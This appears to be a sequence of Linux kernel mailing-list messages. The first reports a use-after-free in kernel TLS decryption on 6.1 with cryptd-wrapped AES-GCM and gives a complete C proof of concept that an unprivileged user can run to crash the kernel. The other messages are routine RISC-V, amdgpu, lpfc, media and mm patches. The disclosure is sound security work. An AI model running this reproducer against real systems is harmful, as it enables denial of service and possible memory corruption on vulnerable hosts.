Hi all,
Commit 41532b785e (tls: separate no-async decryption request handling from async) [1] actually covers a UAF read and write bug in the kernel, and should be backported to 6.1. As of now, it has only been backported to 6.6, back from the time when the patch was committed. The commit mentions a non-reproducible UAF that was previously observed, but we managed to hit the vulnerable case.
The vulnerable case is when a user wraps an existing crypto algorithm (such as gcm or ghash) in cryptd. By default, cryptd-wrapped algorithms have a higher priority than the base variant. tls_decrypt_sg allocates the aead request, and triggers the crypto handling with tls_do_decryption. When the crypto is handled by cryptd, it gets dispatched to a worker that handles it and initially returns EINPROGRESS. While older LTS versions (5.4, 5.10, and 5.15) seem to have an additional crypto_wait_req call in those cases, 6.1 just returns success and frees the aead request. The cryptd worker could still be operating in this case, which causes a UAF.
However, this vulnerability only occurs when the CPU is without AVX support (perhaps this is why there were reproducibility difficulties). With AVX, aesni_init calls simd_register_aeads_compat to force the crypto subsystem to use the SIMD version and avoids the async issues raised by cryptd. While I doubt many people are using host systems without AVX these days, this environment is pretty common in VMs when QEMU uses KVM without using the "-cpu host" flag.
The following is a repro, and can be triggered from unprivileged users. Multishot KASAN shows multiple UAF reads and writes, and ends up panicking the system with a null dereference.
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/tcp.h>
#include <linux/tls.h>
#include <sys/resource.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <linux/if_alg.h>
#include <signal.h>
#include <sys/wait.h>
#include <time.h>
struct tls_conn {
int tx;
int rx;
};
void tls_enable(int sk, int type) {
struct tls12_crypto_info_aes_gcm_256 tls_ci = {
.info.version = TLS_1_3_VERSION,
.info.cipher_type = TLS_CIPHER_AES_GCM_256,
};
setsockopt(sk, IPPROTO_TCP, TCP_ULP, "tls", sizeof("tls"));
setsockopt(sk, SOL_TLS, type, &tls_ci, sizeof(tls_ci));
}
struct tls_conn *tls_create_conn(int port) {
int s0 = socket(AF_INET, SOCK_STREAM, 0);
int s1 = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in a = {
.sin_family = AF_INET,
.sin_port = htons(port),
.sin_addr = htobe32(0),
};
bind(s0, (struct sockaddr*)&a, sizeof(a));
listen(s0, 1);
connect(s1, (struct sockaddr *)&a, sizeof(a));
int s2 = accept(s0, 0, 0);
close(s0);
tls_enable(s1, TLS_TX);
tls_enable(s2, TLS_RX);
struct tls_conn *t = calloc(1, sizeof(struct tls_conn));
t->tx = s1;
t->rx = s2;
return t;
}
void tls_destroy_conn(struct tls_conn *t) {
close(t->tx);
close(t->rx);
free(t);
}
int tls_send(struct tls_conn *t, char *data, size_t size) {
return sendto(t->tx, data, size, 0, NULL, 0);
}
int tls_recv(struct tls_conn *t, char *data, size_t size) {
return recvfrom(t->rx, data, size, 0, NULL, NULL);
}
int crypto_register_algo(char *type, char *name) {
int s = socket(AF_ALG, SOCK_SEQPACKET, 0);
struct sockaddr_alg sa = {};
sa.salg_family = AF_ALG;
strcpy(sa.salg_type, type);
strcpy(sa.salg_name, name);
bind(s, (struct sockaddr *)&sa, sizeof(sa));
close(s);
return 0;
}
int main(void) {
char buff[0x2000];
crypto_register_algo("aead", "cryptd(gcm(aes))");
struct tls_conn *t = tls_create_conn(20000);
tls_send(t, buff, 0x10);
tls_recv(t, buff, 0x100);
}
Feel free to let us know if you have any questions and if there is anything else we can do to help.
Best,
Will
Savy
[1] https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?…
The hwprobe vDSO data for some keys, like MISALIGNED_VECTOR_PERF,
is determined by an asynchronous kthread. This can create a race
condition where the kthread finishes after the vDSO data has
already been populated, causing userspace to read stale values.
To fix this race, a new 'ready' flag is added to the vDSO data,
initialized to 'false' during arch_initcall_sync. This flag is
checked by both the vDSO's user-space code and the riscv_hwprobe
syscall. The syscall serves as a one-time gate, using a completion
to wait for any pending probes before populating the data and
setting the flag to 'true', thus ensuring userspace reads fresh
values on its first request.
Reported-by: Tsukasa OI <research_trasio(a)irq.a4lg.com>
Closes: https://lore.kernel.org/linux-riscv/760d637b-b13b-4518-b6bf-883d55d44e7f@ir…
Fixes: e7c9d66e313b ("RISC-V: Report vector unaligned access speed hwprobe")
Cc: Palmer Dabbelt <palmer(a)dabbelt.com>
Cc: Alexandre Ghiti <alexghiti(a)rivosinc.com>
Cc: Olof Johansson <olof(a)lixom.net>
Cc: stable(a)vger.kernel.org
Reviewed-by: Alexandre Ghiti <alexghiti(a)rivosinc.com>
Co-developed-by: Palmer Dabbelt <palmer(a)dabbelt.com>
Signed-off-by: Palmer Dabbelt <palmer(a)dabbelt.com>
Signed-off-by: Jingwei Wang <wangjingwei(a)iscas.ac.cn>
---
Changes in v8:
- Based on feedback from Alexandre, reverted the initcall back to
arch_initcall_sync since the DO_ONCE logic makes a late init redundant.
- Added the required Reviewed-by and Signed-off-by tags and fixed minor
formatting nits.
Changes in v7:
- Refined the on-demand synchronization by using the DO_ONCE_SLEEPABLE
macro.
- Fixed a build error for nommu configs and addressed several coding
style issues reported by the CI.
Changes in v6:
- Based on Palmer's feedback, reworked the synchronization to be on-demand,
deferring the wait until the first hwprobe syscall via a 'ready' flag.
This avoids the boot-time regression from v5's approach.
Changes in v5:
- Reworked the synchronization logic to a robust "sentinel-count"
pattern based on feedback from Alexandre.
- Fixed a "multiple definition" linker error for nommu builds by changing
the header-file stub functions to `static inline`, as pointed out by Olof.
- Updated the commit message to better explain the rationale for moving
the vDSO initialization to `late_initcall`.
Changes in v4:
- Reworked the synchronization mechanism based on feedback from Palmer
and Alexandre.
- Instead of a post-hoc refresh, this version introduces a robust
completion-based framework using an atomic counter to ensure async
probes are finished before populating the vDSO.
- Moved the vdso data initialization to a late_initcall to avoid
impacting boot time.
Changes in v3:
- Retained existing blank line.
Changes in v2:
- Addressed feedback from Yixun's regarding #ifdef CONFIG_MMU usage.
- Updated commit message to provide a high-level summary.
- Added Fixes tag for commit e7c9d66e313b.
v1: https://lore.kernel.org/linux-riscv/20250521052754.185231-1-wangjingwei@isc…
arch/riscv/include/asm/hwprobe.h | 7 +++
arch/riscv/include/asm/vdso/arch_data.h | 6 ++
arch/riscv/kernel/sys_hwprobe.c | 70 ++++++++++++++++++----
arch/riscv/kernel/unaligned_access_speed.c | 9 ++-
arch/riscv/kernel/vdso/hwprobe.c | 2 +-
5 files changed, 79 insertions(+), 15 deletions(-)
diff --git a/arch/riscv/include/asm/hwprobe.h b/arch/riscv/include/asm/hwprobe.h
index 7fe0a379474ae2c6..5fe10724d307dc99 100644
--- a/arch/riscv/include/asm/hwprobe.h
+++ b/arch/riscv/include/asm/hwprobe.h
@@ -41,4 +41,11 @@ static inline bool riscv_hwprobe_pair_cmp(struct riscv_hwprobe *pair,
return pair->value == other_pair->value;
}
+#ifdef CONFIG_MMU
+void riscv_hwprobe_register_async_probe(void);
+void riscv_hwprobe_complete_async_probe(void);
+#else
+static inline void riscv_hwprobe_register_async_probe(void) {}
+static inline void riscv_hwprobe_complete_async_probe(void) {}
+#endif
#endif
diff --git a/arch/riscv/include/asm/vdso/arch_data.h b/arch/riscv/include/asm/vdso/arch_data.h
index da57a3786f7a53c8..88b37af55175129b 100644
--- a/arch/riscv/include/asm/vdso/arch_data.h
+++ b/arch/riscv/include/asm/vdso/arch_data.h
@@ -12,6 +12,12 @@ struct vdso_arch_data {
/* Boolean indicating all CPUs have the same static hwprobe values. */
__u8 homogeneous_cpus;
+
+ /*
+ * A gate to check and see if the hwprobe data is actually ready, as
+ * probing is deferred to avoid boot slowdowns.
+ */
+ __u8 ready;
};
#endif /* __RISCV_ASM_VDSO_ARCH_DATA_H */
diff --git a/arch/riscv/kernel/sys_hwprobe.c b/arch/riscv/kernel/sys_hwprobe.c
index 0b170e18a2beba57..44201160b9c43177 100644
--- a/arch/riscv/kernel/sys_hwprobe.c
+++ b/arch/riscv/kernel/sys_hwprobe.c
@@ -5,6 +5,9 @@
* more details.
*/
#include <linux/syscalls.h>
+#include <linux/completion.h>
+#include <linux/atomic.h>
+#include <linux/once.h>
#include <asm/cacheflush.h>
#include <asm/cpufeature.h>
#include <asm/hwprobe.h>
@@ -452,28 +455,32 @@ static int hwprobe_get_cpus(struct riscv_hwprobe __user *pairs,
return 0;
}
-static int do_riscv_hwprobe(struct riscv_hwprobe __user *pairs,
- size_t pair_count, size_t cpusetsize,
- unsigned long __user *cpus_user,
- unsigned int flags)
-{
- if (flags & RISCV_HWPROBE_WHICH_CPUS)
- return hwprobe_get_cpus(pairs, pair_count, cpusetsize,
- cpus_user, flags);
+#ifdef CONFIG_MMU
- return hwprobe_get_values(pairs, pair_count, cpusetsize,
- cpus_user, flags);
+static DECLARE_COMPLETION(boot_probes_done);
+static atomic_t pending_boot_probes = ATOMIC_INIT(1);
+
+void riscv_hwprobe_register_async_probe(void)
+{
+ atomic_inc(&pending_boot_probes);
}
-#ifdef CONFIG_MMU
+void riscv_hwprobe_complete_async_probe(void)
+{
+ if (atomic_dec_and_test(&pending_boot_probes))
+ complete(&boot_probes_done);
+}
-static int __init init_hwprobe_vdso_data(void)
+static int complete_hwprobe_vdso_data(void)
{
struct vdso_arch_data *avd = vdso_k_arch_data;
u64 id_bitsmash = 0;
struct riscv_hwprobe pair;
int key;
+ if (unlikely(!atomic_dec_and_test(&pending_boot_probes)))
+ wait_for_completion(&boot_probes_done);
+
/*
* Initialize vDSO data with the answers for the "all CPUs" case, to
* save a syscall in the common case.
@@ -501,13 +508,52 @@ static int __init init_hwprobe_vdso_data(void)
* vDSO should defer to the kernel for exotic cpu masks.
*/
avd->homogeneous_cpus = id_bitsmash != 0 && id_bitsmash != -1;
+
+ /*
+ * Make sure all the VDSO values are visible before we look at them.
+ * This pairs with the implicit "no speculativly visible accesses"
+ * barrier in the VDSO hwprobe code.
+ */
+ smp_wmb();
+ avd->ready = true;
+ return 0;
+}
+
+static int __init init_hwprobe_vdso_data(void)
+{
+ struct vdso_arch_data *avd = vdso_k_arch_data;
+
+ /*
+ * Prevent the vDSO cached values from being used, as they're not ready
+ * yet.
+ */
+ avd->ready = false;
return 0;
}
arch_initcall_sync(init_hwprobe_vdso_data);
+#else
+
+static int complete_hwprobe_vdso_data(void) { return 0; }
+
#endif /* CONFIG_MMU */
+static int do_riscv_hwprobe(struct riscv_hwprobe __user *pairs,
+ size_t pair_count, size_t cpusetsize,
+ unsigned long __user *cpus_user,
+ unsigned int flags)
+{
+ DO_ONCE_SLEEPABLE(complete_hwprobe_vdso_data);
+
+ if (flags & RISCV_HWPROBE_WHICH_CPUS)
+ return hwprobe_get_cpus(pairs, pair_count, cpusetsize,
+ cpus_user, flags);
+
+ return hwprobe_get_values(pairs, pair_count, cpusetsize,
+ cpus_user, flags);
+}
+
SYSCALL_DEFINE5(riscv_hwprobe, struct riscv_hwprobe __user *, pairs,
size_t, pair_count, size_t, cpusetsize, unsigned long __user *,
cpus, unsigned int, flags)
diff --git a/arch/riscv/kernel/unaligned_access_speed.c b/arch/riscv/kernel/unaligned_access_speed.c
index ae2068425fbcd207..aa912c62fb70ba0e 100644
--- a/arch/riscv/kernel/unaligned_access_speed.c
+++ b/arch/riscv/kernel/unaligned_access_speed.c
@@ -379,6 +379,7 @@ static void check_vector_unaligned_access(struct work_struct *work __always_unus
static int __init vec_check_unaligned_access_speed_all_cpus(void *unused __always_unused)
{
schedule_on_each_cpu(check_vector_unaligned_access);
+ riscv_hwprobe_complete_async_probe();
return 0;
}
@@ -473,8 +474,12 @@ static int __init check_unaligned_access_all_cpus(void)
per_cpu(vector_misaligned_access, cpu) = unaligned_vector_speed_param;
} else if (!check_vector_unaligned_access_emulated_all_cpus() &&
IS_ENABLED(CONFIG_RISCV_PROBE_VECTOR_UNALIGNED_ACCESS)) {
- kthread_run(vec_check_unaligned_access_speed_all_cpus,
- NULL, "vec_check_unaligned_access_speed_all_cpus");
+ riscv_hwprobe_register_async_probe();
+ if (IS_ERR(kthread_run(vec_check_unaligned_access_speed_all_cpus,
+ NULL, "vec_check_unaligned_access_speed_all_cpus"))) {
+ pr_warn("Failed to create vec_unalign_check kthread\n");
+ riscv_hwprobe_complete_async_probe();
+ }
}
/*
diff --git a/arch/riscv/kernel/vdso/hwprobe.c b/arch/riscv/kernel/vdso/hwprobe.c
index 2ddeba6c68dda09b..bf77b4c1d2d8e803 100644
--- a/arch/riscv/kernel/vdso/hwprobe.c
+++ b/arch/riscv/kernel/vdso/hwprobe.c
@@ -27,7 +27,7 @@ static int riscv_vdso_get_values(struct riscv_hwprobe *pairs, size_t pair_count,
* homogeneous, then this function can handle requests for arbitrary
* masks.
*/
- if ((flags != 0) || (!all_cpus && !avd->homogeneous_cpus))
+ if ((flags != 0) || (!all_cpus && !avd->homogeneous_cpus) || unlikely(!avd->ready))
return riscv_hwprobe(pairs, pair_count, cpusetsize, cpus, flags);
/* This is something we can handle, fill out the pairs. */
--
2.50.1
From: Guchun Chen <guchun.chen(a)amd.com>
[ Upstream commit 248b061689a40f4fed05252ee2c89f87cf26d7d8 ]
In current code, when a PCI error state pci_channel_io_normal is detectd,
it will report PCI_ERS_RESULT_CAN_RECOVER status to PCI driver, and PCI
driver will continue the execution of PCI resume callback report_resume by
pci_walk_bridge, and the callback will go into amdgpu_pci_resume
finally, where write lock is releasd unconditionally without acquiring
such lock first. In this case, a deadlock will happen when other threads
start to acquire the read lock.
To fix this, add a member in amdgpu_device strucutre to cache
pci_channel_state, and only continue the execution in amdgpu_pci_resume
when it's pci_channel_io_frozen.
Fixes: c9a6b82f45e2 ("drm/amdgpu: Implement DPC recovery")
Suggested-by: Andrey Grodzovsky <andrey.grodzovsky(a)amd.com>
Signed-off-by: Guchun Chen <guchun.chen(a)amd.com>
Reviewed-by: Andrey Grodzovsky <andrey.grodzovsky(a)amd.com>
Signed-off-by: Alex Deucher <alexander.deucher(a)amd.com>
Signed-off-by: Sasha Levin <sashal(a)kernel.org>
[Shivani: Modified to apply on 5.10.y]
Signed-off-by: Shivani Agarwal <shivani.agarwal(a)broadcom.com>
---
drivers/gpu/drm/amd/amdgpu/amdgpu.h | 1 +
drivers/gpu/drm/amd/amdgpu/amdgpu_device.c | 6 ++++++
2 files changed, 7 insertions(+)
diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu.h b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
index ff5555353eb4..683bbefc39c1 100644
--- a/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+++ b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
@@ -997,6 +997,7 @@ struct amdgpu_device {
bool in_pci_err_recovery;
struct pci_saved_state *pci_state;
+ pci_channel_state_t pci_channel_state;
};
static inline struct amdgpu_device *drm_to_adev(struct drm_device *ddev)
diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
index 40d2f0ed1c75..8efd3ee2621f 100644
--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
@@ -4944,6 +4944,8 @@ pci_ers_result_t amdgpu_pci_error_detected(struct pci_dev *pdev, pci_channel_sta
return PCI_ERS_RESULT_DISCONNECT;
}
+ adev->pci_channel_state = state;
+
switch (state) {
case pci_channel_io_normal:
return PCI_ERS_RESULT_CAN_RECOVER;
@@ -5079,6 +5081,10 @@ void amdgpu_pci_resume(struct pci_dev *pdev)
DRM_INFO("PCI error: resume callback!!\n");
+ /* Only continue execution for the case of pci_channel_io_frozen */
+ if (adev->pci_channel_state != pci_channel_io_frozen)
+ return;
+
for (i = 0; i < AMDGPU_MAX_RINGS; ++i) {
struct amdgpu_ring *ring = adev->rings[i];
--
2.40.4
Hi,
The first four patches in this series are miscellaneous fixes and
improvements in the Cadence and TI CSI-RX drivers around probing, fwnode
and link creation.
The last two patches add support for transmitting multiple pixels per
clock on the internal bus between Cadence CSI-RX bridge and TI CSI-RX
wrapper. As this internal bus is 32-bit wide, the maximum number of
pixels that can be transmitted per cycle depend upon the format's bit
width. Secondly, the downstream element must support unpacking of
multiple pixels.
Thus we export a module function that can be used by the downstream
driver to negotiate the pixels per cycle on the output pixel stream of
the Cadence bridge.
Signed-off-by: Jai Luthra <jai.luthra(a)ideasonboard.com>
---
Changes in v3:
- Move cdns-csi2rx header to include/media
- Export symbol from cdns-csi2rx.c to be used only through
the j721e-csi2rx.c module namespace
- Other minor fixes suggested by Sakari
- Add Abhilash's T-by tags
- Link to v2: https://lore.kernel.org/r/20250410-probe_fixes-v2-0-801bc6eebdea@ideasonboa…
Changes in v2:
- Rebase on v6.15-rc1
- Fix lkp warnings in PATCH 5/6 missing header for FIELD_PREP
- Add R-By tags from Devarsh and Changhuang
- Link to v1: https://lore.kernel.org/r/20250324-probe_fixes-v1-0-5cd5b9e1cfac@ideasonboa…
---
Jai Luthra (6):
media: ti: j721e-csi2rx: Use devm_of_platform_populate
media: ti: j721e-csi2rx: Use fwnode_get_named_child_node
media: ti: j721e-csi2rx: Fix source subdev link creation
media: cadence: csi2rx: Implement get_fwnode_pad op
media: cadence: cdns-csi2rx: Support multiple pixels per clock cycle
media: ti: j721e-csi2rx: Support multiple pixels per clock
MAINTAINERS | 1 +
drivers/media/platform/cadence/cdns-csi2rx.c | 74 ++++++++++++++++------
drivers/media/platform/ti/Kconfig | 3 +-
.../media/platform/ti/j721e-csi2rx/j721e-csi2rx.c | 65 ++++++++++++++-----
include/media/cadence/cdns-csi2rx.h | 19 ++++++
5 files changed, 127 insertions(+), 35 deletions(-)
---
base-commit: 19272b37aa4f83ca52bdf9c16d5d81bdd1354494
change-id: 20250314-probe_fixes-7e0ec33c7fee
Best regards,
--
Jai Luthra <jai.luthra(a)ideasonboard.com>
From: James Smart <jsmart2021(a)gmail.com>
[ Upstream commit 1854f53ccd88ad4e7568ddfafafffe71f1ceb0a6 ]
If an FC link down transition while PLOGIs are outstanding to fabric well
known addresses, outstanding ABTS requests may result in a NULL pointer
dereference. Driver unload requests may hang with repeated "2878" log
messages.
The Link down processing results in ABTS requests for outstanding ELS
requests. The Abort WQEs are sent for the ELSs before the driver had set
the link state to down. Thus the driver is sending the Abort with the
expectation that an ABTS will be sent on the wire. The Abort request is
stalled waiting for the link to come up. In some conditions the driver may
auto-complete the ELSs thus if the link does come up, the Abort completions
may reference an invalid structure.
Fix by ensuring that Abort set the flag to avoid link traffic if issued due
to conditions where the link failed.
Link: https://lore.kernel.org/r/20211020211417.88754-7-jsmart2021@gmail.com
Co-developed-by: Justin Tee <justin.tee(a)broadcom.com>
Signed-off-by: Justin Tee <justin.tee(a)broadcom.com>
Signed-off-by: James Smart <jsmart2021(a)gmail.com>
Signed-off-by: Martin K. Petersen <martin.petersen(a)oracle.com>
Signed-off-by: Sasha Levin <sashal(a)kernel.org>
[Shivani: Modified to apply on 5.10.y]
Signed-off-by: Shivani Agarwal <shivani.agarwal(a)broadcom.com>
---
drivers/scsi/lpfc/lpfc_sli.c | 8 +++++---
1 file changed, 5 insertions(+), 3 deletions(-)
diff --git a/drivers/scsi/lpfc/lpfc_sli.c b/drivers/scsi/lpfc/lpfc_sli.c
index ff39c596f000..49931577da38 100644
--- a/drivers/scsi/lpfc/lpfc_sli.c
+++ b/drivers/scsi/lpfc/lpfc_sli.c
@@ -11432,10 +11432,12 @@ lpfc_sli_abort_iotag_issue(struct lpfc_hba *phba, struct lpfc_sli_ring *pring,
if (cmdiocb->iocb_flag & LPFC_IO_FOF)
abtsiocbp->iocb_flag |= LPFC_IO_FOF;
- if (phba->link_state >= LPFC_LINK_UP)
- iabt->ulpCommand = CMD_ABORT_XRI_CN;
- else
+ if (phba->link_state < LPFC_LINK_UP ||
+ (phba->sli_rev == LPFC_SLI_REV4 &&
+ phba->sli4_hba.link_state.status == LPFC_FC_LA_TYPE_LINK_DOWN))
iabt->ulpCommand = CMD_CLOSE_XRI_CN;
+ else
+ iabt->ulpCommand = CMD_ABORT_XRI_CN;
abtsiocbp->iocb_cmpl = lpfc_sli_abort_els_cmpl;
abtsiocbp->vport = vport;
--
2.40.4
The quilt patch titled
Subject: proc: proc_maps_open allow proc_mem_open to return NULL
has been removed from the -mm tree. Its filename was
proc-proc_maps_open-allow-proc_mem_open-to-return-null.patch
This patch was dropped because it was merged into the mm-hotfixes-stable branch
of git://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm
------------------------------------------------------
From: Jialin Wang <wjl.linux(a)gmail.com>
Subject: proc: proc_maps_open allow proc_mem_open to return NULL
Date: Fri, 8 Aug 2025 00:54:55 +0800
The commit 65c66047259f ("proc: fix the issue of proc_mem_open returning
NULL") caused proc_maps_open() to return -ESRCH when proc_mem_open()
returns NULL. This breaks legitimate /proc/<pid>/maps access for kernel
threads since kernel threads have NULL mm_struct.
The regression causes perf to fail and exit when profiling a kernel
thread:
# perf record -v -g -p $(pgrep kswapd0)
...
couldn't open /proc/65/task/65/maps
This patch partially reverts the commit to fix it.
Link: https://lkml.kernel.org/r/20250807165455.73656-1-wjl.linux@gmail.com
Fixes: 65c66047259f ("proc: fix the issue of proc_mem_open returning NULL")
Signed-off-by: Jialin Wang <wjl.linux(a)gmail.com>
Cc: Penglei Jiang <superman.xpt(a)gmail.com>
Cc: <stable(a)vger.kernel.org>
Signed-off-by: Andrew Morton <akpm(a)linux-foundation.org>
---
fs/proc/task_mmu.c | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
--- a/fs/proc/task_mmu.c~proc-proc_maps_open-allow-proc_mem_open-to-return-null
+++ a/fs/proc/task_mmu.c
@@ -340,8 +340,8 @@ static int proc_maps_open(struct inode *
priv->inode = inode;
priv->mm = proc_mem_open(inode, PTRACE_MODE_READ);
- if (IS_ERR_OR_NULL(priv->mm)) {
- int err = priv->mm ? PTR_ERR(priv->mm) : -ESRCH;
+ if (IS_ERR(priv->mm)) {
+ int err = PTR_ERR(priv->mm);
seq_release_private(inode, file);
return err;
_
Patches currently in -mm which might be from wjl.linux(a)gmail.com are
The quilt patch titled
Subject: userfaultfd: fix a crash in UFFDIO_MOVE when PMD is a migration entry
has been removed from the -mm tree. Its filename was
userfaultfd-fix-a-crash-in-uffdio_move-when-pmd-is-a-migration-entry.patch
This patch was dropped because it was merged into the mm-hotfixes-stable branch
of git://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm
------------------------------------------------------
From: Suren Baghdasaryan <surenb(a)google.com>
Subject: userfaultfd: fix a crash in UFFDIO_MOVE when PMD is a migration entry
Date: Wed, 6 Aug 2025 15:00:22 -0700
When UFFDIO_MOVE encounters a migration PMD entry, it proceeds with
obtaining a folio and accessing it even though the entry is swp_entry_t.
Add the missing check and let split_huge_pmd() handle migration entries.
While at it also remove unnecessary folio check.
[surenb(a)google.com: remove extra folio check, per David]
Link: https://lkml.kernel.org/r/20250807200418.1963585-1-surenb@google.com
Link: https://lkml.kernel.org/r/20250806220022.926763-1-surenb@google.com
Fixes: adef440691ba ("userfaultfd: UFFDIO_MOVE uABI")
Signed-off-by: Suren Baghdasaryan <surenb(a)google.com>
Reported-by: syzbot+b446dbe27035ef6bd6c2(a)syzkaller.appspotmail.com
Closes: https://lore.kernel.org/all/68794b5c.a70a0220.693ce.0050.GAE@google.com/
Reviewed-by: Peter Xu <peterx(a)redhat.com>
Acked-by: David Hildenbrand <david(a)redhat.com>
Cc: Andrea Arcangeli <aarcange(a)redhat.com>
Cc: Lokesh Gidra <lokeshgidra(a)google.com>
Cc: <stable(a)vger.kernel.org>
Signed-off-by: Andrew Morton <akpm(a)linux-foundation.org>
---
mm/userfaultfd.c | 15 +++++++++------
1 file changed, 9 insertions(+), 6 deletions(-)
--- a/mm/userfaultfd.c~userfaultfd-fix-a-crash-in-uffdio_move-when-pmd-is-a-migration-entry
+++ a/mm/userfaultfd.c
@@ -1821,13 +1821,16 @@ ssize_t move_pages(struct userfaultfd_ct
/* Check if we can move the pmd without splitting it. */
if (move_splits_huge_pmd(dst_addr, src_addr, src_start + len) ||
!pmd_none(dst_pmdval)) {
- struct folio *folio = pmd_folio(*src_pmd);
+ /* Can be a migration entry */
+ if (pmd_present(*src_pmd)) {
+ struct folio *folio = pmd_folio(*src_pmd);
- if (!folio || (!is_huge_zero_folio(folio) &&
- !PageAnonExclusive(&folio->page))) {
- spin_unlock(ptl);
- err = -EBUSY;
- break;
+ if (!is_huge_zero_folio(folio) &&
+ !PageAnonExclusive(&folio->page)) {
+ spin_unlock(ptl);
+ err = -EBUSY;
+ break;
+ }
}
spin_unlock(ptl);
_
Patches currently in -mm which might be from surenb(a)google.com are
mm-limit-the-scope-of-vma_start_read.patch
mm-change-vma_start_read-to-drop-rcu-lock-on-failure.patch
selftests-proc-test-procmap_query-ioctl-while-vma-is-concurrently-modified.patch
fs-proc-task_mmu-factor-out-proc_maps_private-fields-used-by-procmap_query.patch
fs-proc-task_mmu-execute-procmap_query-ioctl-under-per-vma-locks.patch